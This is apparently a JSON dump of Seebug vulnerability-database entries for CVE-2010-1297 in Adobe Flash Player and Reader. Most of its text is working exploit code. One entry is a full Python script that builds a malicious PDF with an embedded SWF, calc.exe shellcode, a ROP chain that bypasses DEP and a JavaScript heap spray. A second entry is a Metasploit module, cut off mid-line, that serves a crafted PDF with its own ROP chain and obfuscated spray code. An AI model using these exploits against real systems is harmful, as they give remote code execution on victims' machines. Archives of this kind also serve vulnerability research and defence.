BEWARE.\r\n \r\nBy visiting the following link, you agree that you are responsible for any damages that occur.\r\n \r\nhttp://exploit-db.com/sploits/adobe-0day-2010-1297.tar.enc\r\nhttp://sebug.net/paper/Exploits-Archives/2010-exploits/1006-exploits/adobe-0day-2010-1297.tar.enc\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19759", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:21:19", "description": "No description provided by source.", "published": "2014-07-02T00:00:00", "type": "seebug", "title": "Adobe Acrobat Reader and Flash Player - \u201cnewclass\u201d invalid pointer", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2014-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87100", "id": "SSV:87100", "sourceData": "\n '''\r\n __ __ ____ _ _ ____ \r\n | \\/ |/ __ \\ /\\ | | | | _ \\ \r\n | \\ / | | | | / \\ | | | | |_) |\r\n | |\\/| | | | |/ /\\ \\| | | | _ < Day 1 (Binary Analysis)\r\n | | | | |__| / ____ \\ |__| | |_) |\r\n |_| |_|\\____/_/ \\_\\____/|____/ \r\n\r\nhttp://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/\r\nhttp://www.exploit-db.com/sploits/moaub1-adobe-newclass.tar.gz\r\n\r\n Title : Adobe Acrobat Reader and Flash Player \u201cnewclass\u201d invalid pointer vulnerability\r\n Analysis : http://www.abysssec.com\r\n Vendor : http://www.adobe.com\r\n Impact : Ciritical\r\n Contact : shahin [at] abysssec.com , info [at] abysssec.com\r\n Twitter : @abysssec\r\n CVE : CVE-2010-1297\r\n MOAUB Number : MOAUB-01-BA\r\n'''\r\n\r\nimport sys\r\n\r\nclass PDF:\r\n \r\n\tdef __init__(self):\r\n\t\tself.xrefs = []\r\n\t\tself.eol = '\\x0a'\r\n\t\tself.content = ''\r\n\t\tself.xrefs_offset = 0\r\n\t\t\r\n\tdef header(self):\r\n\t\tself.content += '%PDF-1.6' + self.eol\r\n\t\t\r\n\tdef obj(self, obj_num, data,flag):\r\n\t\tself.xrefs.append(len(self.content))\r\n\t\tself.content += '%d 0 obj' % obj_num\r\n\t\tif 
flag == 1:\r\n\t\t\tself.content += self.eol + '<< ' + data + ' >>' + self.eol\r\n\t\telse:\r\n\t\t\tself.content += self.eol + data + self.eol\r\n\t\tself.content += 'endobj' + self.eol\r\n\r\n\tdef obj_SWFStream(self, obj_num, data, stream):\r\n\t\tself.xrefs.append(len(self.content))\r\n\t\tself.content += '%d 0 obj' % obj_num\r\n\t\tself.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream))\r\n\t\tself.content += ' >>' + self.eol\r\n\t\tself.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol\r\n\t\tself.content += 'endobj' + self.eol\r\n\t\r\n\tdef obj_Stream(self, obj_num, data, stream):\r\n\t\tself.xrefs.append(len(self.content))\r\n\t\tself.content += '%d 0 obj' % obj_num\r\n\t\tself.content += self.eol + '<< ' + data + '/Length %d' %len(stream)\r\n\t\tself.content += ' >>' + self.eol\r\n\t\tself.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol\r\n\t\tself.content += 'endobj' + self.eol\r\n\t\t\r\n\tdef ref(self, ref_num):\r\n\t\treturn '%d 0 R' % ref_num\r\n\t\t\r\n\tdef xref(self):\r\n\t\tself.xrefs_offset = len(self.content)\r\n\t\tself.content += 'xref' + self.eol\r\n\t\tself.content += '0 %d' % (len(self.xrefs) + 1)\r\n\t\tself.content += self.eol\r\n\t\tself.content += '0000000000 65535 f' + self.eol\r\n\t\tfor i in self.xrefs:\r\n\t\t\tself.content += '%010d 00000 n' % i\r\n\t\t\tself.content += self.eol\r\n \r\n\tdef trailer(self):\r\n\t\tself.content += 'trailer' + self.eol\r\n\t\tself.content += '<< /Size %d' % (len(self.xrefs) + 1)\r\n\t\tself.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol\r\n\t\tself.content += 'startxref' + self.eol\r\n\t\tself.content += '%d' % self.xrefs_offset\r\n\t\tself.content += self.eol\r\n\t\tself.content += '%%EOF'\r\n\t\t\r\n\tdef generate(self):\r\n\t\treturn self.content\r\n\r\n\r\n\t\t\r\n\t\t\r\nclass Exploit:\r\n \r\n def convert_to_utf16(self, payload):\r\n enc_payload = ''\r\n for i in 
range(0, len(payload), 2):\r\n num = 0\r\n for j in range(0, 2):\r\n num += (ord(payload[i + j]) & 0xff) << (j * 8)\r\n enc_payload += '%%u%04x' % num\r\n return enc_payload\r\n \r\n def get_payload(self): \t\r\n # shellcode calc.exe\r\n payload =("\\x90\\x90\\x90\\x89\\xE5\\xD9\\xEE\\xD9\\x75\\xF4\\x5E\\x56\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49"\r\n\t "\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5A\\x6A\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6B\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41"\r\n\t\t "\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4A\\x49\\x4B\\x4C\\x4B\\x58\\x51\\x54\\x43\\x30\\x43\\x30\\x45\\x50\\x4C\\x4B\\x51\\x55\\x47\\x4C\\x4C\\x4B\\x43\\x4C"\r\n\t\t "\\x43\\x35\\x44\\x38\\x45\\x51\\x4A\\x4F\\x4C\\x4B\\x50\\x4F\\x44\\x58\\x4C\\x4B\\x51\\x4F\\x47\\x50\\x45\\x51\\x4A\\x4B\\x51\\x59\\x4C\\x4B\\x46\\x54\\x4C"\r\n\t\t "\\x4B\\x43\\x31\\x4A\\x4E\\x46\\x51\\x49\\x50\\x4A\\x39\\x4E\\x4C\\x4C\\x44\\x49\\x50\\x42\\x54\\x45\\x57\\x49\\x51\\x48\\x4A\\x44\\x4D\\x45\\x51\\x49\\x52"\r\n\t\t "\\x4A\\x4B\\x4B\\x44\\x47\\x4B\\x46\\x34\\x46\\x44\\x45\\x54\\x43\\x45\\x4A\\x45\\x4C\\x4B\\x51\\x4F\\x47\\x54\\x43\\x31\\x4A\\x4B\\x43\\x56\\x4C\\x4B\\x44"\r\n\t\t "\\x4C\\x50\\x4B\\x4C\\x4B\\x51\\x4F\\x45\\x4C\\x45\\x51\\x4A\\x4B\\x4C\\x4B\\x45\\x4C\\x4C\\x4B\\x43\\x31\\x4A\\x4B\\x4C\\x49\\x51\\x4C\\x47\\x54\\x45\\x54"\r\n\t\t "\\x48\\x43\\x51\\x4F\\x46\\x51\\x4C\\x36\\x43\\x50\\x46\\x36\\x45\\x34\\x4C\\x4B\\x50\\x46\\x50\\x30\\x4C\\x4B\\x47\\x30\\x44\\x4C\\x4C\\x4B\\x44\\x30\\x45"\r\n\t\t "\\x4C\\x4E\\x4D\\x4C\\x4B\\x42\\x48\\x44\\x48\\x4D\\x59\\x4B\\x48\\x4B\\x33\\x49\\x50\\x43\\x5A\\x46\\x30\\x45\\x38\\x4C\\x30\\x4C\\x4A\\x45\\x54\\x51\\x4F"\r\n\t\t "\\x42\\x48\\x4D\\x48\\x4B\\x4E\\x4D\\x5A\\x44\\x4E\\x50\\x57\\x4B\\x4F\\x4A\\x47\\x43\\x53\\x47\\x4A\\x51\\x4C\\x50\\x57\\x51\\x59\\x50\\x4E\\x50\\x44\\x50"\r\n\t\t 
"\\x4F\\x46\\x37\\x50\\x53\\x51\\x4C\\x43\\x43\\x42\\x59\\x44\\x33\\x43\\x44\\x43\\x55\\x42\\x4D\\x50\\x33\\x50\\x32\\x51\\x4C\\x42\\x43\\x45\\x31\\x42\\x4C"\r\n\t\t "\\x42\\x43\\x46\\x4E\\x45\\x35\\x44\\x38\\x42\\x45\\x43\\x30\\x41\\x41")\r\n return payload\r\n\r\n\r\n def getSWF(self):\r\n try:\r\n #swfFile = sys.argv[2]\r\n fdR = open('flash.swf', 'rb+')\r\n strTotal = fdR.read()\r\n str1 = strTotal[:88]\r\n addr1 = '\\x06\\xa6\\x17\\x30' # addr = 0c0c0c0c\t\t\t\r\n str2 = strTotal[92:533]\r\n\t\t\t#*************************** Bypass DEP by VirtualProtect ********************************\r\n rop = ''\r\n rop += "\\x77\\xFA\\x44\\x7E" # mov edi,esp ret 4\r\n rop += "\\x94\\x28\\xc2\\x77"\t #add esp,20 pop ebp ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\xD4\\x1A\\x80\\x7C" # VirtualProtect\r\n rop += "BBBB"\t\t\t # Ret Addr for VirtualProtect\r\n rop += "CCCC"\t\t\t # Param1\t(lpAddress)\r\n rop += "DDDD"\t\t\t # Param2\t(Size)\r\n rop += "EEEE"\t\t\t # Param3\t(flNewProtect)\r\n rop += "\\x10\\xB0\\xEF\\x77" # Param4 (Writable Address)\r\n rop += "AAAAAAAAAAAA"\t\t #padding\r\n rop += "\\xC2\\x4D\\xC3\\x77"\t #mov eax,edi pop esi ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\xF2\\xE1\\x12\\x06"\t #add eax,94 ret\r\n rop += "\\x70\\xDC\\xEE\\x77" #push esp pop ebp ret4\r\n rop += "\\x16\\x9A\\x94\\x7C"\t #mov [ebp-30],eax ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\xC2\\x4D\\xC3\\x77" #mov eax,edi pop esi ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\xF2\\xE1\\x12\\x06"\t #add eax,94 ret\r\n rop += "\\x79\\x9E\\x83\\x7C"\t #mov [ebp-2c],eax ret\r\n rop += "\\x27\\x56\\xEA\\x77"\t #mov eax,6b3 ret\r\n rop += "\\x14\\x83\\xE0\\x77"\t #mov [ebp-28],eax ret\r\n rop += "\\xB4\\x01\\xF2\\x77"\t #xor eax,eax ret\r\n rop += "\\x88\\x41\\x97\\x7C"\t #add eax,40 pop ebp ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\x70\\xDC\\xEE\\x77"\t #push esp pop ebp ret4\r\n rop += "\\xC0\\x9E\\xEF\\x77"\t #mov [ebp-54],eax ret\r\n rop += 
"AAAA"\t\t\t\t #padding\r\n rop += "\\xC2\\x4D\\xC3\\x77"\t #mov eax,edi pop esi ret\r\n rop += "AAAA"\t\t\t\t #padding\r\n rop += "\\xC1\\xF2\\xC1\\x77"\t #add eax,8 ret\r\n rop += "\\xCF\\x97\\xDE\\x77"\t #xchg eax,esp ret\r\n\t\t\t\r\n str3 = strTotal[669:1249]\r\n alignESP = "\\x83\\xc4\\x03"\r\n sc = self.get_payload()\r\n\t\t\t\r\n if len(sc) > 2118:\r\n print "[*] Error : payload length is long"\r\n return\r\n if len(sc) <= 2118:\r\n dif = 2118 - len(sc)\r\n while dif > 0 :\r\n sc += '\\x90'\r\n dif = dif - 1\r\n\t\t\t\r\n str4 = strTotal[3370:3726]\r\n\t\t\t\r\n addr2 = '\\xF2\\x3D\\x8D\\x23' # Enter 0C75 , 81 RET\t\r\n\t\t\t\r\n str5 = strTotal[3730:]\r\n\t\t\t\r\n fdW= open('exploit.swf', 'wb+')\r\n finalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5\r\n fdW.write(finalStr)\t\r\n \t\t\r\n #strTotal = open('exploit.swf', 'rb+').read()\r\n fdW.close()\r\n fdR.close()\r\n return finalStr\r\n \r\n except IOError:\r\n print '[*] Error : An IO error has occurred'\r\n\t\t\r\n def HeapSpray(self):\r\n spray = '''\t\r\n function spray_heap()\r\n {\r\n var chunk_size, payload, nopsled;\r\n \r\n chunk_size = 0x1A0000;\r\n pointers = 
unescape("%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030");\r\n pointerSled = unescape("<Contents>");\r\n while (pointerSled.length < chunk_size)\r\n pointerSled += pointerSled;\r\n pointerSled_len = chunk_size - (pointers.length + 20); \r\n pointerSled = pointerSled.substring(0, pointerSled_len);\r\n heap_chunks = new Array();\r\n for (var i = 0 ; i < <CHUNKS> ; i++)\r\n heap_chunks[i] = pointerSled + pointers;\r\n } \r\n \r\n \r\n spray_heap(); \r\n '''\r\n\t\t\r\n spray = spray.replace('<Contents>', '%u33dd%u3030') # Pointer to XCHG ESP , EBX\r\n '''\r\nAuthplay.dll\r\n\t\t\r\n303033DD ? 87DC XCHG ESP,EBX\r\n\r\n#############################################################\r\n\t\t\t\t\t will do nothing\t\r\n\r\n303033DF ? 45 INC EBP\r\n303033E0 ? 05 00898784 ADD EAX,84878900 \r\n303033E5 ? 42 INC EDX\r\n303033E6 ? 05 008987E8 ADD EAX,E8878900\r\n303033EB ? 41 INC ECX\r\n303033EC ? 05 008987EC ADD EAX,EC878900\r\n303033F1 ? 41 INC ECX\r\n303033F2 ? 05 008987F0 ADD EAX,F0878900\r\n303033F7 ? 41 INC ECX\r\n303033F8 ? 
05 008987F4 ADD EAX,F4878900\r\n303033FD ? 41 INC ECX\r\n303033FE ? 05 005F5E5D ADD EAX,5D5E5F00\r\n30303403 . B8 01000000 MOV EAX,1\r\n30303408 . 5B POP EBX\r\n############################################################\r\n\r\n30303409 . 83C4 30 ADD ESP,30\r\n3030340C . C3 RETN\r\n\r\n '''\r\n\r\n spray = spray.replace('<CHUNKS>', '40') #Chunk count\r\n return spray\r\n\t\t\r\ndef generate_pdf():\r\n\texploit = Exploit()\r\n\tswfFile = 'exploit.swf'\r\n\tpdf = PDF()\r\n\tpdf.header()\r\n\tpdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1)\r\n\t#pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1)\r\n\tpdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1)\r\n\tpdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1)\r\n\tpdf.obj_Stream(4, '','')\r\n\tpdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1)\r\n\tpdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1) \r\n\tpdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1)\r\n\tpdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1)\t\r\n\tpdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1)\t\r\n\tpdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1)\t\r\n\tpdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1)\t\r\n\tpdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1)\t\r\n\tpdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1)\r\n\tpdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',exploit.getSWF() ) \r\n\tpdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings 
'+pdf.ref(16),1)\r\n\tpdf.obj_Stream(16, '<</Length 0 >> ','') \r\n\tpdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1) \r\n\t\r\n\tpdf.xref()\r\n\tpdf.trailer()\r\n\treturn pdf.generate()\r\n\t\r\ndef main():\r\n\tif len(sys.argv) != 2:\r\n\t\tprint 'Usage: python %s [output file name]' % sys.argv[0]\r\n\t\tsys.exit(0)\r\n\tfile_name = sys.argv[1]\r\n\tif not file_name.endswith('.pdf'):\r\n\t\tfile_name = file_name + '.pdf'\r\n\ttry:\r\n\t\tfd = open(file_name, 'wb+')\r\n\t\tfd.write(generate_pdf())\r\n\t\tfd.close()\r\n\t\tprint '[-] PDF file generated and written to %s' % file_name\r\n\texcept IOError:\r\n\t\tprint '[*] Error : An IO error has occurred'\r\n\t\tprint '[-] Exiting ...'\r\n\t\tsys.exit(-1)\r\nif __name__ == '__main__':\r\n\tmain()\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-87100"}, {"lastseen": "2017-11-19T16:50:31", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71128", "id": "SSV:71128", "sourceData": "\n ##\r\n# $Id: adobe_flashplayer_newfunction.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the DoABC tag handling within\r\n\t\t\t\tversions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\r\n\t\t\t\tvulnerable, as are any other applications that may embed Flash player.\r\n\r\n\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\r\n\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\r\n\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\r\n\r\n\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\r\n\t\t\t\tadobe_libtiff module. 
This method is unlikely to work across various\r\n\t\t\t\tWindows versions due a the hardcoded syscall number.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Found being openly exploited\r\n\t\t\t\t\t'jduck' # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2010-1297'],\r\n\t\t\t\t\t['OSVDB', '65141'],\r\n\t\t\t\t\t['BID', '40586'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],\r\n\t\t\t\t\t# For SWF->PDF embedding\r\n\t\t\t\t\t['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'HTTP::compression' => 'gzip',\r\n\t\t\t\t\t'HTTP::chunked' => true,\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => "\\x00",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 04 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# load the static swf file\r\n\t\tpath = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2010-1297.swf" )\r\n\t\tfd = File.open( path, "rb" )\r\n\t\t@swf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tprint_status("Sending crafted PDF w/SWF to #{cli.peerhost}:#{cli.peerport}")\r\n\r\n\t\tjs_data = 
make_js(regenerate_payload(cli).encoded)\r\n\t\tpdf_data = make_pdf(@swf_data, js_data)\r\n\t\tsend_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using BIB.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x70048ef, # xchg eax,esp / ret\r\n\t\t\t0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009033, # ret 0x18\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7001599, # pop ebp / ret\r\n\t\t\t0x10124,\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10104,\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x1000,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x7ffe0300, # -- location of KiFastSystemCall\r\n\t\t\t0x7007fb2, # mov eax, [ecx] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10100,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\r\n\t\t\t0x7005c54, # pop esi / add esp,0x14 / 
ret\r\n\t\t\t0xffffffff,\r\n\t\t\t0x10100,\r\n\t\t\t0x0,\r\n\t\t\t0x10104,\r\n\t\t\t0x1000,\r\n\t\t\t0x40,\r\n\t\t\t# The next bit effectively copies data from the interleaved stack to the memory\r\n\t\t\t# pointed to by eax\r\n\t\t\t# The data copied is:\r\n\t\t\t# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\r\n\t\t\t# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\r\n\t\t\t# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x9054905a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5815eb5a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x18891a8b,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x8304c083,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xfb8104c2,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5ebee75,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xffffe6e8,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x909090ff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / 
ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90ffffff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x700112f # call eax -- (execute stub to transition to full shellcode)\r\n\t\t].pack('V*')\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = ''\r\n\t\tpayload_buf << stack_data\r\n\t\tpayload_buf << encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\r\nvar #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );\r\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += 